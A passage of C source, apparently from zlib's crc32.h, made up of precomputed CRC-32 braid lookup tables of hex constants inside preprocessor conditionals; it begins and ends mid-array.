0xfd9fe19f, 0x2009381a, 0xbd8d91ab, 0x601b482e, 0xddd124e0, 0x0047fd65, 0x7d34fb3d, 0xa0a222b8, 0x1d684e76, 0xc0fe97f3, 
0xe78e42c6, 0x3a189b43, 0x87d2f78d, 0x5a442e08, 0x27372850, 0xfaa1f1d5, 0x476b9d1b, 0x9afd449e, 0x098a3771, 0xd41ceef4, 0x69d6823a, 0xb4405bbf, 0xc9335de7, 0x14a58462, 0xa96fe8ac, 0x74f93129, 0x5389e41c, 0x8e1f3d99, 0x33d55157, 0xee4388d2, 0x93308e8a, 0x4ea6570f, 0xf36c3bc1, 0x2efae244, 0x0ef3da5e, 0xd36503db, 0x6eaf6f15, 0xb339b690, 0xce4ab0c8, 0x13dc694d, 0xae160583, 0x7380dc06, 0x54f00933, 0x8966d0b6, 0x34acbc78, 0xe93a65fd, 0x944963a5, 0x49dfba20, 0xf415d6ee, 0x29830f6b, 0xbaf47c84, 0x6762a501, 0xdaa8c9cf, 0x073e104a, 0x7a4d1612, 0xa7dbcf97, 0x1a11a359, 0xc7877adc, 0xe0f7afe9, 0x3d61766c, 0x80ab1aa2, 0x5d3dc327, 0x204ec57f, 0xfdd81cfa, 0x40127034, 0x9d84a9b1, 0xa06a2517, 0x7dfcfc92, 0xc036905c, 0x1da049d9, 0x60d34f81, 0xbd459604, 0x008ffaca, 0xdd19234f, 0xfa69f67a, 0x27ff2fff, 0x9a354331, 0x47a39ab4, 0x3ad09cec, 0xe7464569, 0x5a8c29a7, 0x871af022, 0x146d83cd, 0xc9fb5a48, 0x74313686, 0xa9a7ef03, 0xd4d4e95b, 0x094230de, 0xb4885c10, 0x691e8595, 0x4e6e50a0, 0x93f88925, 0x2e32e5eb, 0xf3a43c6e, 0x8ed73a36, 0x5341e3b3, 0xee8b8f7d, 0x331d56f8, 0x13146ee2, 0xce82b767, 0x7348dba9, 0xaede022c, 0xd3ad0474, 0x0e3bddf1, 0xb3f1b13f, 0x6e6768ba, 0x4917bd8f, 0x9481640a, 0x294b08c4, 0xf4ddd141, 0x89aed719, 0x54380e9c, 0xe9f26252, 0x3464bbd7, 0xa713c838, 0x7a8511bd, 0xc74f7d73, 0x1ad9a4f6, 0x67aaa2ae, 0xba3c7b2b, 0x07f617e5, 0xda60ce60, 0xfd101b55, 0x2086c2d0, 0x9d4cae1e, 0x40da779b, 0x3da971c3, 0xe03fa846, 0x5df5c488, 0x80631d0d, 0x1de7b4bc, 0xc0716d39, 0x7dbb01f7, 0xa02dd872, 0xdd5ede2a, 0x00c807af, 0xbd026b61, 0x6094b2e4, 0x47e467d1, 0x9a72be54, 0x27b8d29a, 0xfa2e0b1f, 0x875d0d47, 0x5acbd4c2, 0xe701b80c, 0x3a976189, 0xa9e01266, 0x7476cbe3, 0xc9bca72d, 0x142a7ea8, 0x695978f0, 0xb4cfa175, 0x0905cdbb, 0xd493143e, 0xf3e3c10b, 0x2e75188e, 0x93bf7440, 0x4e29adc5, 0x335aab9d, 0xeecc7218, 0x53061ed6, 0x8e90c753, 0xae99ff49, 0x730f26cc, 0xcec54a02, 0x13539387, 0x6e2095df, 0xb3b64c5a, 0x0e7c2094, 0xd3eaf911, 0xf49a2c24, 0x290cf5a1, 0x94c6996f, 0x495040ea, 0x342346b2, 0xe9b59f37, 
0x547ff3f9, 0x89e92a7c, 0x1a9e5993, 0xc7088016, 0x7ac2ecd8, 0xa754355d, 0xda273305, 0x07b1ea80, 0xba7b864e, 0x67ed5fcb, 0x409d8afe, 0x9d0b537b, 0x20c13fb5, 0xfd57e630, 0x8024e068, 0x5db239ed, 0xe0785523, 0x3dee8ca6}}; local const z_word_t FAR crc_braid_big_table[][256] = { {0x00000000, 0x85d996dd, 0x4bb55c60, 0xce6ccabd, 0x966ab9c0, 0x13b32f1d, 0xdddfe5a0, 0x5806737d, 0x6dd3035a, 0xe80a9587, 0x26665f3a, 0xa3bfc9e7, 0xfbb9ba9a, 0x7e602c47, 0xb00ce6fa, 0x35d57027, 0xdaa607b4, 0x5f7f9169, 0x91135bd4, 0x14cacd09, 0x4cccbe74, 0xc91528a9, 0x0779e214, 0x82a074c9, 0xb77504ee, 0x32ac9233, 0xfcc0588e, 0x7919ce53, 0x211fbd2e, 0xa4c62bf3, 0x6aaae14e, 0xef737793, 0xf54b7eb3, 0x7092e86e, 0xbefe22d3, 0x3b27b40e, 0x6321c773, 0xe6f851ae, 0x28949b13, 0xad4d0dce, 0x98987de9, 0x1d41eb34, 0xd32d2189, 0x56f4b754, 0x0ef2c429, 0x8b2b52f4, 0x45479849, 0xc09e0e94, 0x2fed7907, 0xaa34efda, 0x64582567, 0xe181b3ba, 0xb987c0c7, 0x3c5e561a, 0xf2329ca7, 0x77eb0a7a, 0x423e7a5d, 0xc7e7ec80, 0x098b263d, 0x8c52b0e0, 0xd454c39d, 0x518d5540, 0x9fe19ffd, 0x1a380920, 0xab918dbd, 0x2e481b60, 0xe024d1dd, 0x65fd4700, 0x3dfb347d, 0xb822a2a0, 0x764e681d, 0xf397fec0, 0xc6428ee7, 0x439b183a, 0x8df7d287, 0x082e445a, 0x50283727, 0xd5f1a1fa, 0x1b9d6b47, 0x9e44fd9a, 0x71378a09, 0xf4ee1cd4, 0x3a82d669, 0xbf5b40b4, 0xe75d33c9, 0x6284a514, 0xace86fa9, 0x2931f974, 0x1ce48953, 0x993d1f8e, 0x5751d533, 0xd28843ee, 0x8a8e3093, 0x0f57a64e, 0xc13b6cf3, 0x44e2fa2e, 0x5edaf30e, 0xdb0365d3, 0x156faf6e, 0x90b639b3, 0xc8b04ace, 0x4d69dc13, 0x830516ae, 0x06dc8073, 0x3309f054, 0xb6d06689, 0x78bcac34, 0xfd653ae9, 0xa5634994, 0x20badf49, 0xeed615f4, 0x6b0f8329, 0x847cf4ba, 0x01a56267, 0xcfc9a8da, 0x4a103e07, 0x12164d7a, 0x97cfdba7, 0x59a3111a, 0xdc7a87c7, 0xe9aff7e0, 0x6c76613d, 0xa21aab80, 0x27c33d5d, 0x7fc54e20, 0xfa1cd8fd, 0x34701240, 0xb1a9849d, 0x17256aa0, 0x92fcfc7d, 0x5c9036c0, 0xd949a01d, 0x814fd360, 0x049645bd, 0xcafa8f00, 0x4f2319dd, 0x7af669fa, 0xff2fff27, 0x3143359a, 0xb49aa347, 0xec9cd03a, 0x694546e7, 0xa7298c5a, 
0x22f01a87, 0xcd836d14, 0x485afbc9, 0x86363174, 0x03efa7a9, 0x5be9d4d4, 0xde304209, 0x105c88b4, 0x95851e69, 0xa0506e4e, 0x2589f893, 0xebe5322e, 0x6e3ca4f3, 0x363ad78e, 0xb3e34153, 0x7d8f8bee, 0xf8561d33, 0xe26e1413, 0x67b782ce, 0xa9db4873, 0x2c02deae, 0x7404add3, 0xf1dd3b0e, 0x3fb1f1b3, 0xba68676e, 0x8fbd1749, 0x0a648194, 0xc4084b29, 0x41d1ddf4, 0x19d7ae89, 0x9c0e3854, 0x5262f2e9, 0xd7bb6434, 0x38c813a7, 0xbd11857a, 0x737d4fc7, 0xf6a4d91a, 0xaea2aa67, 0x2b7b3cba, 0xe517f607, 0x60ce60da, 0x551b10fd, 0xd0c28620, 0x1eae4c9d, 0x9b77da40, 0xc371a93d, 0x46a83fe0, 0x88c4f55d, 0x0d1d6380, 0xbcb4e71d, 0x396d71c0, 0xf701bb7d, 0x72d82da0, 0x2ade5edd, 0xaf07c800, 0x616b02bd, 0xe4b29460, 0xd167e447, 0x54be729a, 0x9ad2b827, 0x1f0b2efa, 0x470d5d87, 0xc2d4cb5a, 0x0cb801e7, 0x8961973a, 0x6612e0a9, 0xe3cb7674, 0x2da7bcc9, 0xa87e2a14, 0xf0785969, 0x75a1cfb4, 0xbbcd0509, 0x3e1493d4, 0x0bc1e3f3, 0x8e18752e, 0x4074bf93, 0xc5ad294e, 0x9dab5a33, 0x1872ccee, 0xd61e0653, 0x53c7908e, 0x49ff99ae, 0xcc260f73, 0x024ac5ce, 0x87935313, 0xdf95206e, 0x5a4cb6b3, 0x94207c0e, 0x11f9ead3, 0x242c9af4, 0xa1f50c29, 0x6f99c694, 0xea405049, 0xb2462334, 0x379fb5e9, 0xf9f37f54, 0x7c2ae989, 0x93599e1a, 0x168008c7, 0xd8ecc27a, 0x5d3554a7, 0x053327da, 0x80eab107, 0x4e867bba, 0xcb5fed67, 0xfe8a9d40, 0x7b530b9d, 0xb53fc120, 0x30e657fd, 0x68e02480, 0xed39b25d, 0x235578e0, 0xa68cee3d}, {0x00000000, 0x76e10f9d, 0xadc46ee1, 0xdb25617c, 0x1b8fac19, 0x6d6ea384, 0xb64bc2f8, 0xc0aacd65, 0x361e5933, 0x40ff56ae, 0x9bda37d2, 0xed3b384f, 0x2d91f52a, 0x5b70fab7, 0x80559bcb, 0xf6b49456, 0x6c3cb266, 0x1addbdfb, 0xc1f8dc87, 0xb719d31a, 0x77b31e7f, 0x015211e2, 0xda77709e, 0xac967f03, 0x5a22eb55, 0x2cc3e4c8, 0xf7e685b4, 0x81078a29, 0x41ad474c, 0x374c48d1, 0xec6929ad, 0x9a882630, 0xd87864cd, 0xae996b50, 0x75bc0a2c, 0x035d05b1, 0xc3f7c8d4, 0xb516c749, 0x6e33a635, 0x18d2a9a8, 0xee663dfe, 0x98873263, 0x43a2531f, 0x35435c82, 0xf5e991e7, 0x83089e7a, 0x582dff06, 0x2eccf09b, 0xb444d6ab, 0xc2a5d936, 0x1980b84a, 0x6f61b7d7, 0xafcb7ab2, 
0xd92a752f, 0x020f1453, 0x74ee1bce, 0x825a8f98, 0xf4bb8005, 0x2f9ee179, 0x597feee4, 0x99d52381, 0xef342c1c, 0x34114d60, 0x42f042fd, 0xf1f7b941, 0x8716b6dc, 0x5c33d7a0, 0x2ad2d83d, 0xea781558, 0x9c991ac5, 0x47bc7bb9, 0x315d7424, 0xc7e9e072, 0xb108efef, 0x6a2d8e93, 0x1ccc810e, 0xdc664c6b, 0xaa8743f6, 0x71a2228a, 0x07432d17, 0x9dcb0b27, 0xeb2a04ba, 0x300f65c6, 0x46ee6a5b, 0x8644a73e, 0xf0a5a8a3, 0x2b80c9df, 0x5d61c642, 0xabd55214, 0xdd345d89, 0x06113cf5, 0x70f03368, 0xb05afe0d, 0xc6bbf190, 0x1d9e90ec, 0x6b7f9f71, 0x298fdd8c, 0x5f6ed211, 0x844bb36d, 0xf2aabcf0, 0x32007195, 0x44e17e08, 0x9fc41f74, 0xe92510e9, 0x1f9184bf, 0x69708b22, 0xb255ea5e, 0xc4b4e5c3, 0x041e28a6, 0x72ff273b, 0xa9da4647, 0xdf3b49da, 0x45b36fea, 0x33526077, 0xe877010b, 0x9e960e96, 0x5e3cc3f3, 0x28ddcc6e, 0xf3f8ad12, 0x8519a28f, 0x73ad36d9, 0x054c3944, 0xde695838, 0xa88857a5, 0x68229ac0, 0x1ec3955d, 0xc5e6f421, 0xb307fbbc, 0xe2ef7383, 0x940e7c1e, 0x4f2b1d62, 0x39ca12ff, 0xf960df9a, 0x8f81d007, 0x54a4b17b, 0x2245bee6, 0xd4f12ab0, 0xa210252d, 0x79354451, 0x0fd44bcc, 0xcf7e86a9, 0xb99f8934, 0x62bae848, 0x145be7d5, 0x8ed3c1e5, 0xf832ce78, 0x2317af04, 0x55f6a099, 0x955c6dfc, 0xe3bd6261, 0x3898031d, 0x4e790c80, 0xb8cd98d6, 0xce2c974b, 0x1509f637, 0x63e8f9aa, 0xa34234cf, 0xd5a33b52, 0x0e865a2e, 0x786755b3, 0x3a97174e, 0x4c7618d3, 0x975379af, 0xe1b27632, 0x2118bb57, 0x57f9b4ca, 0x8cdcd5b6, 0xfa3dda2b, 0x0c894e7d, 0x7a6841e0, 0xa14d209c, 0xd7ac2f01, 0x1706e264, 0x61e7edf9, 0xbac28c85, 0xcc238318, 0x56aba528, 0x204aaab5, 0xfb6fcbc9, 0x8d8ec454, 0x4d240931, 0x3bc506ac, 0xe0e067d0, 0x9601684d, 0x60b5fc1b, 0x1654f386, 0xcd7192fa, 0xbb909d67, 0x7b3a5002, 0x0ddb5f9f, 0xd6fe3ee3, 0xa01f317e, 0x1318cac2, 0x65f9c55f, 0xbedca423, 0xc83dabbe, 0x089766db, 0x7e766946, 0xa553083a, 0xd3b207a7, 0x250693f1, 0x53e79c6c, 0x88c2fd10, 0xfe23f28d, 0x3e893fe8, 0x48683075, 0x934d5109, 0xe5ac5e94, 0x7f2478a4, 0x09c57739, 0xd2e01645, 0xa40119d8, 0x64abd4bd, 0x124adb20, 0xc96fba5c, 0xbf8eb5c1, 0x493a2197, 0x3fdb2e0a, 0xe4fe4f76, 
0x921f40eb, 0x52b58d8e, 0x24548213, 0xff71e36f, 0x8990ecf2, 0xcb60ae0f, 0xbd81a192, 0x66a4c0ee, 0x1045cf73, 0xd0ef0216, 0xa60e0d8b, 0x7d2b6cf7, 0x0bca636a, 0xfd7ef73c, 0x8b9ff8a1, 0x50ba99dd, 0x265b9640, 0xe6f15b25, 0x901054b8, 0x4b3535c4, 0x3dd43a59, 0xa75c1c69, 0xd1bd13f4, 0x0a987288, 0x7c797d15, 0xbcd3b070, 0xca32bfed, 0x1117de91, 0x67f6d10c, 0x9142455a, 0xe7a34ac7, 0x3c862bbb, 0x4a672426, 0x8acde943, 0xfc2ce6de, 0x270987a2, 0x51e8883f}, {0x00000000, 0xe8dbfbb9, 0x91b186a8, 0x796a7d11, 0x63657c8a, 0x8bbe8733, 0xf2d4fa22, 0x1a0f019b, 0x87cc89cf, 0x6f177276, 0x167d0f67, 0xfea6f4de, 0xe4a9f545, 0x0c720efc, 0x751873ed, 0x9dc38854, 0x4f9f6244, 0xa74499fd, 0xde2ee4ec, 0x36f51f55, 0x2cfa1ece, 0xc421e577, 0xbd4b9866, 0x559063df, 0xc853eb8b, 0x20881032, 0x59e26d23, 0xb139969a, 0xab369701, 0x43ed6cb8, 0x3a8711a9, 0xd25cea10, 0x9e3ec588, 0x76e53e31, 0x0f8f4320, 0xe754b899, 0xfd5bb902, 0x158042bb, 0x6cea3faa, 0x8431c413, 0x19f24c47, 0xf129b7fe, 0x8843caef, 0x60983156, 0x7a9730cd, 0x924ccb74, 0xeb26b665, 0x03fd4ddc, 0xd1a1a7cc, 0x397a5c75, 0x40102164, 0xa8cbdadd, 0xb2c4db46, 0x5a1f20ff, 0x23755dee, 0xcbaea657, 0x566d2e03, 0xbeb6d5ba, 0xc7dca8ab, 0x2f075312, 0x35085289, 0xddd3a930, 0xa4b9d421, 0x4c622f98, 0x7d7bfbca, 0x95a00073, 0xecca7d62, 0x041186db, 0x1e1e8740, 0xf6c57cf9, 0x8faf01e8, 0x6774fa51, 0xfab77205, 0x126c89bc, 0x6b06f4ad, 0x83dd0f14, 0x99d20e8f, 0x7109f536, 0x08638827, 0xe0b8739e, 0x32e4998e, 0xda3f6237, 0xa3551f26, 0x4b8ee49f, 0x5181e504, 0xb95a1ebd, 0xc03063ac, 0x28eb9815, 0xb5281041, 0x5df3ebf8, 0x249996e9, 0xcc426d50, 0xd64d6ccb, 0x3e969772, 0x47fcea63, 0xaf2711da, 0xe3453e42, 0x0b9ec5fb, 0x72f4b8ea, 0x9a2f4353, 0x802042c8, 0x68fbb971, 0x1191c460, 0xf94a3fd9, 0x6489b78d, 0x8c524c34, 0xf5383125, 0x1de3ca9c, 0x07eccb07, 0xef3730be, 0x965d4daf, 0x7e86b616, 0xacda5c06, 0x4401a7bf, 0x3d6bdaae, 0xd5b02117, 0xcfbf208c, 0x2764db35, 0x5e0ea624, 0xb6d55d9d, 0x2b16d5c9, 0xc3cd2e70, 0xbaa75361, 0x527ca8d8, 0x4873a943, 0xa0a852fa, 0xd9c22feb, 0x3119d452, 0xbbf0874e, 
0x532b7cf7, 0x2a4101e6, 0xc29afa5f, 0xd895fbc4, 0x304e007d, 0x49247d6c, 0xa1ff86d5, 0x3c3c0e81, 0xd4e7f538, 0xad8d8829, 0x45567390, 0x5f59720b, 0xb78289b2, 0xcee8f4a3, 0x26330f1a, 0xf46fe50a, 0x1cb41eb3, 0x65de63a2, 0x8d05981b, 0x970a9980, 0x7fd16239, 0x06bb1f28, 0xee60e491, 0x73a36cc5, 0x9b78977c, 0xe212ea6d, 0x0ac911d4, 0x10c6104f, 0xf81debf6, 0x817796e7, 0x69ac6d5e, 0x25ce42c6, 0xcd15b97f, 0xb47fc46e, 0x5ca43fd7, 0x46ab3e4c, 0xae70c5f5, 0xd71ab8e4, 0x3fc1435d, 0xa202cb09, 0x4ad930b0, 0x33b34da1, 0xdb68b618, 0xc167b783, 0x29bc4c3a, 0x50d6312b, 0xb80dca92, 0x6a512082, 0x828adb3b, 0xfbe0a62a, 0x133b5d93, 0x09345c08, 0xe1efa7b1, 0x9885daa0, 0x705e2119, 0xed9da94d, 0x054652f4, 0x7c2c2fe5, 0x94f7d45c, 0x8ef8d5c7, 0x66232e7e, 0x1f49536f, 0xf792a8d6, 0xc68b7c84, 0x2e50873d, 0x573afa2c, 0xbfe10195, 0xa5ee000e, 0x4d35fbb7, 0x345f86a6, 0xdc847d1f, 0x4147f54b, 0xa99c0ef2, 0xd0f673e3, 0x382d885a, 0x222289c1, 0xcaf97278, 0xb3930f69, 0x5b48f4d0, 0x89141ec0, 0x61cfe579, 0x18a59868, 0xf07e63d1, 0xea71624a, 0x02aa99f3, 0x7bc0e4e2, 0x931b1f5b, 0x0ed8970f, 0xe6036cb6, 0x9f6911a7, 0x77b2ea1e, 0x6dbdeb85, 0x8566103c, 0xfc0c6d2d, 0x14d79694, 0x58b5b90c, 0xb06e42b5, 0xc9043fa4, 0x21dfc41d, 0x3bd0c586, 0xd30b3e3f, 0xaa61432e, 0x42bab897, 0xdf7930c3, 0x37a2cb7a, 0x4ec8b66b, 0xa6134dd2, 0xbc1c4c49, 0x54c7b7f0, 0x2dadcae1, 0xc5763158, 0x172adb48, 0xfff120f1, 0x869b5de0, 0x6e40a659, 0x744fa7c2, 0x9c945c7b, 0xe5fe216a, 0x0d25dad3, 0x90e65287, 0x783da93e, 0x0157d42f, 0xe98c2f96, 0xf3832e0d, 0x1b58d5b4, 0x6232a8a5, 0x8ae9531c}, {0x00000000, 0x919168ae, 0x6325a087, 0xf2b4c829, 0x874c31d4, 0x16dd597a, 0xe4699153, 0x75f8f9fd, 0x4f9f1373, 0xde0e7bdd, 0x2cbab3f4, 0xbd2bdb5a, 0xc8d322a7, 0x59424a09, 0xabf68220, 0x3a67ea8e, 0x9e3e27e6, 0x0faf4f48, 0xfd1b8761, 0x6c8aefcf, 0x19721632, 0x88e37e9c, 0x7a57b6b5, 0xebc6de1b, 0xd1a13495, 0x40305c3b, 0xb2849412, 0x2315fcbc, 0x56ed0541, 0xc77c6def, 0x35c8a5c6, 0xa459cd68, 0x7d7b3f17, 0xecea57b9, 0x1e5e9f90, 0x8fcff73e, 0xfa370ec3, 0x6ba6666d, 0x9912ae44, 
0x0883c6ea, 0x32e42c64, 0xa37544ca, 0x51c18ce3, 0xc050e44d, 0xb5a81db0, 0x2439751e, 0xd68dbd37, 0x471cd599, 0xe34518f1, 0x72d4705f, 0x8060b876, 0x11f1d0d8, 0x64092925, 0xf598418b, 0x072c89a2, 0x96bde10c, 0xacda0b82, 0x3d4b632c, 0xcfffab05, 0x5e6ec3ab, 0x2b963a56, 0xba0752f8, 0x48b39ad1, 0xd922f27f, 0xfaf67e2e, 0x6b671680, 0x99d3dea9, 0x0842b607, 0x7dba4ffa, 0xec2b2754, 0x1e9fef7d, 0x8f0e87d3, 0xb5696d5d, 0x24f805f3, 0xd64ccdda, 0x47dda574, 0x32255c89, 0xa3b43427, 0x5100fc0e, 0xc09194a0, 0x64c859c8, 0xf5593166, 0x07edf94f, 0x967c91e1, 0xe384681c, 0x721500b2, 0x80a1c89b, 0x1130a035, 0x2b574abb, 0xbac62215, 0x4872ea3c, 0xd9e38292, 0xac1b7b6f, 0x3d8a13c1, 0xcf3edbe8, 0x5eafb346, 0x878d4139, 0x161c2997, 0xe4a8e1be, 0x75398910, 0x00c170ed, 0x91501843, 0x63e4d06a, 0xf275b8c4, 0xc812524a, 0x59833ae4, 0xab37f2cd, 0x3aa69a63, 0x4f5e639e, 0xdecf0b30, 0x2c7bc319, 0xbdeaabb7, 0x19b366df, 0x88220e71, 0x7a96c658, 0xeb07aef6, 0x9eff570b, 0x0f6e3fa5, 0xfddaf78c, 0x6c4b9f22, 0x562c75ac, 0xc7bd1d02, 0x3509d52b, 0xa498bd85, 0xd1604478, 0x40f12cd6, 0xb245e4ff, 0x23d48c51, 0xf4edfd5c, 0x657c95f2, 0x97c85ddb, 0x06593575, 0x73a1cc88, 0xe230a426, 0x10846c0f, 0x811504a1, 0xbb72ee2f, 0x2ae38681, 0xd8574ea8, 0x49c62606, 0x3c3edffb, 0xadafb755, 0x5f1b7f7c, 0xce8a17d2, 0x6ad3daba, 0xfb42b214, 0x09f67a3d, 0x98671293, 0xed9feb6e, 0x7c0e83c0, 0x8eba4be9, 0x1f2b2347, 0x254cc9c9, 0xb4dda167, 0x4669694e, 0xd7f801e0, 0xa200f81d, 0x339190b3, 0xc125589a, 0x50b43034, 0x8996c24b, 0x1807aae5, 0xeab362cc, 0x7b220a62, 0x0edaf39f, 0x9f4b9b31, 0x6dff5318, 0xfc6e3bb6, 0xc609d138, 0x5798b996, 0xa52c71bf, 0x34bd1911, 0x4145e0ec, 0xd0d48842, 0x2260406b, 0xb3f128c5, 0x17a8e5ad, 0x86398d03, 0x748d452a, 0xe51c2d84, 0x90e4d479, 0x0175bcd7, 0xf3c174fe, 0x62501c50, 0x5837f6de, 0xc9a69e70, 0x3b125659, 0xaa833ef7, 0xdf7bc70a, 0x4eeaafa4, 0xbc5e678d, 0x2dcf0f23, 0x0e1b8372, 0x9f8aebdc, 0x6d3e23f5, 0xfcaf4b5b, 0x8957b2a6, 0x18c6da08, 0xea721221, 0x7be37a8f, 0x41849001, 0xd015f8af, 0x22a13086, 0xb3305828, 0xc6c8a1d5, 
0x5759c97b, 0xa5ed0152, 0x347c69fc, 0x9025a494, 0x01b4cc3a, 0xf3000413, 0x62916cbd, 0x17699540, 0x86f8fdee, 0x744c35c7, 0xe5dd5d69, 0xdfbab7e7, 0x4e2bdf49, 0xbc9f1760, 0x2d0e7fce, 0x58f68633, 0xc967ee9d, 0x3bd326b4, 0xaa424e1a, 0x7360bc65, 0xe2f1d4cb, 0x10451ce2, 0x81d4744c, 0xf42c8db1, 0x65bde51f, 0x97092d36, 0x06984598, 0x3cffaf16, 0xad6ec7b8, 0x5fda0f91, 0xce4b673f, 0xbbb39ec2, 0x2a22f66c, 0xd8963e45, 0x490756eb, 0xed5e9b83, 0x7ccff32d, 0x8e7b3b04, 0x1fea53aa, 0x6a12aa57, 0xfb83c2f9, 0x09370ad0, 0x98a6627e, 0xa2c188f0, 0x3350e05e, 0xc1e42877, 0x507540d9, 0x258db924, 0xb41cd18a, 0x46a819a3, 0xd739710d}}; #endif #endif #if N == 5 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0xaf449247, 0x85f822cf, 0x2abcb088, 0xd08143df, 0x7fc5d198, 0x55796110, 0xfa3df357, 0x7a7381ff, 0xd53713b8, 0xff8ba330, 0x50cf3177, 0xaaf2c220, 0x05b65067, 0x2f0ae0ef, 0x804e72a8, 0xf4e703fe, 0x5ba391b9, 0x711f2131, 0xde5bb376, 0x24664021, 0x8b22d266, 0xa19e62ee, 0x0edaf0a9, 0x8e948201, 0x21d01046, 0x0b6ca0ce, 0xa4283289, 0x5e15c1de, 0xf1515399, 0xdbede311, 0x74a97156, 0x32bf01bd, 0x9dfb93fa, 0xb7472372, 0x1803b135, 0xe23e4262, 0x4d7ad025, 0x67c660ad, 0xc882f2ea, 0x48cc8042, 0xe7881205, 0xcd34a28d, 0x627030ca, 0x984dc39d, 0x370951da, 0x1db5e152, 0xb2f17315, 0xc6580243, 0x691c9004, 0x43a0208c, 0xece4b2cb, 0x16d9419c, 0xb99dd3db, 0x93216353, 0x3c65f114, 0xbc2b83bc, 0x136f11fb, 0x39d3a173, 0x96973334, 0x6caac063, 0xc3ee5224, 0xe952e2ac, 0x461670eb, 0x657e037a, 0xca3a913d, 0xe08621b5, 0x4fc2b3f2, 0xb5ff40a5, 0x1abbd2e2, 0x3007626a, 0x9f43f02d, 0x1f0d8285, 0xb04910c2, 0x9af5a04a, 0x35b1320d, 0xcf8cc15a, 0x60c8531d, 0x4a74e395, 0xe53071d2, 0x91990084, 0x3edd92c3, 0x1461224b, 0xbb25b00c, 0x4118435b, 0xee5cd11c, 0xc4e06194, 0x6ba4f3d3, 0xebea817b, 0x44ae133c, 0x6e12a3b4, 0xc15631f3, 0x3b6bc2a4, 0x942f50e3, 0xbe93e06b, 0x11d7722c, 0x57c102c7, 0xf8859080, 0xd2392008, 0x7d7db24f, 0x87404118, 0x2804d35f, 0x02b863d7, 0xadfcf190, 0x2db28338, 0x82f6117f, 0xa84aa1f7, 0x070e33b0, 
0xfd33c0e7, 0x527752a0, 0x78cbe228, 0xd78f706f, 0xa3260139, 0x0c62937e, 0x26de23f6, 0x899ab1b1, 0x73a742e6, 0xdce3d0a1, 0xf65f6029, 0x591bf26e, 0xd95580c6, 0x76111281, 0x5cada209, 0xf3e9304e, 0x09d4c319, 0xa690515e, 0x8c2ce1d6, 0x23687391, 0xcafc06f4, 0x65b894b3, 0x4f04243b, 0xe040b67c, 0x1a7d452b, 0xb539d76c, 0x9f8567e4, 0x30c1f5a3, 0xb08f870b, 0x1fcb154c, 0x3577a5c4, 0x9a333783, 0x600ec4d4, 0xcf4a5693, 0xe5f6e61b, 0x4ab2745c, 0x3e1b050a, 0x915f974d, 0xbbe327c5, 0x14a7b582, 0xee9a46d5, 0x41ded492, 0x6b62641a, 0xc426f65d, 0x446884f5, 0xeb2c16b2, 0xc190a63a, 0x6ed4347d, 0x94e9c72a, 0x3bad556d, 0x1111e5e5, 0xbe5577a2, 0xf8430749, 0x5707950e, 0x7dbb2586, 0xd2ffb7c1, 0x28c24496, 0x8786d6d1, 0xad3a6659, 0x027ef41e, 0x823086b6, 0x2d7414f1, 0x07c8a479, 0xa88c363e, 0x52b1c569, 0xfdf5572e, 0xd749e7a6, 0x780d75e1, 0x0ca404b7, 0xa3e096f0, 0x895c2678, 0x2618b43f, 0xdc254768, 0x7361d52f, 0x59dd65a7, 0xf699f7e0, 0x76d78548, 0xd993170f, 0xf32fa787, 0x5c6b35c0, 0xa656c697, 0x091254d0, 0x23aee458, 0x8cea761f, 0xaf82058e, 0x00c697c9, 0x2a7a2741, 0x853eb506, 0x7f034651, 0xd047d416, 0xfafb649e, 0x55bff6d9, 0xd5f18471, 0x7ab51636, 0x5009a6be, 0xff4d34f9, 0x0570c7ae, 0xaa3455e9, 0x8088e561, 0x2fcc7726, 0x5b650670, 0xf4219437, 0xde9d24bf, 0x71d9b6f8, 0x8be445af, 0x24a0d7e8, 0x0e1c6760, 0xa158f527, 0x2116878f, 0x8e5215c8, 0xa4eea540, 0x0baa3707, 0xf197c450, 0x5ed35617, 0x746fe69f, 0xdb2b74d8, 0x9d3d0433, 0x32799674, 0x18c526fc, 0xb781b4bb, 0x4dbc47ec, 0xe2f8d5ab, 0xc8446523, 0x6700f764, 0xe74e85cc, 0x480a178b, 0x62b6a703, 0xcdf23544, 0x37cfc613, 0x988b5454, 0xb237e4dc, 0x1d73769b, 0x69da07cd, 0xc69e958a, 0xec222502, 0x4366b745, 0xb95b4412, 0x161fd655, 0x3ca366dd, 0x93e7f49a, 0x13a98632, 0xbced1475, 0x9651a4fd, 0x391536ba, 0xc328c5ed, 0x6c6c57aa, 0x46d0e722, 0xe9947565}, {0x00000000, 0x4e890ba9, 0x9d121752, 0xd39b1cfb, 0xe15528e5, 0xafdc234c, 0x7c473fb7, 0x32ce341e, 0x19db578b, 0x57525c22, 0x84c940d9, 0xca404b70, 0xf88e7f6e, 0xb60774c7, 0x659c683c, 0x2b156395, 0x33b6af16, 0x7d3fa4bf, 
0xaea4b844, 0xe02db3ed, 0xd2e387f3, 0x9c6a8c5a, 0x4ff190a1, 0x01789b08, 0x2a6df89d, 0x64e4f334, 0xb77fefcf, 0xf9f6e466, 0xcb38d078, 0x85b1dbd1, 0x562ac72a, 0x18a3cc83, 0x676d5e2c, 0x29e45585, 0xfa7f497e, 0xb4f642d7, 0x863876c9, 0xc8b17d60, 0x1b2a619b, 0x55a36a32, 0x7eb609a7, 0x303f020e, 0xe3a41ef5, 0xad2d155c, 0x9fe32142, 0xd16a2aeb, 0x02f13610, 0x4c783db9, 0x54dbf13a, 0x1a52fa93, 0xc9c9e668, 0x8740edc1, 0xb58ed9df, 0xfb07d276, 0x289cce8d, 0x6615c524, 0x4d00a6b1, 0x0389ad18, 0xd012b1e3, 0x9e9bba4a, 0xac558e54, 0xe2dc85fd, 0x31479906, 0x7fce92af, 0xcedabc58, 0x8053b7f1, 0x53c8ab0a, 0x1d41a0a3, 0x2f8f94bd, 0x61069f14, 0xb29d83ef, 0xfc148846, 0xd701ebd3, 0x9988e07a, 0x4a13fc81, 0x049af728, 0x3654c336, 0x78ddc89f, 0xab46d464, 0xe5cfdfcd, 0xfd6c134e, 0xb3e518e7, 0x607e041c, 0x2ef70fb5, 0x1c393bab, 0x52b03002, 0x812b2cf9, 0xcfa22750, 0xe4b744c5, 0xaa3e4f6c, 0x79a55397, 0x372c583e, 0x05e26c20, 0x4b6b6789, 0x98f07b72, 0xd67970db, 0xa9b7e274, 0xe73ee9dd, 0x34a5f526, 0x7a2cfe8f, 0x48e2ca91, 0x066bc138, 0xd5f0ddc3, 0x9b79d66a, 0xb06cb5ff, 0xfee5be56, 0x2d7ea2ad, 0x63f7a904, 0x51399d1a, 0x1fb096b3, 0xcc2b8a48, 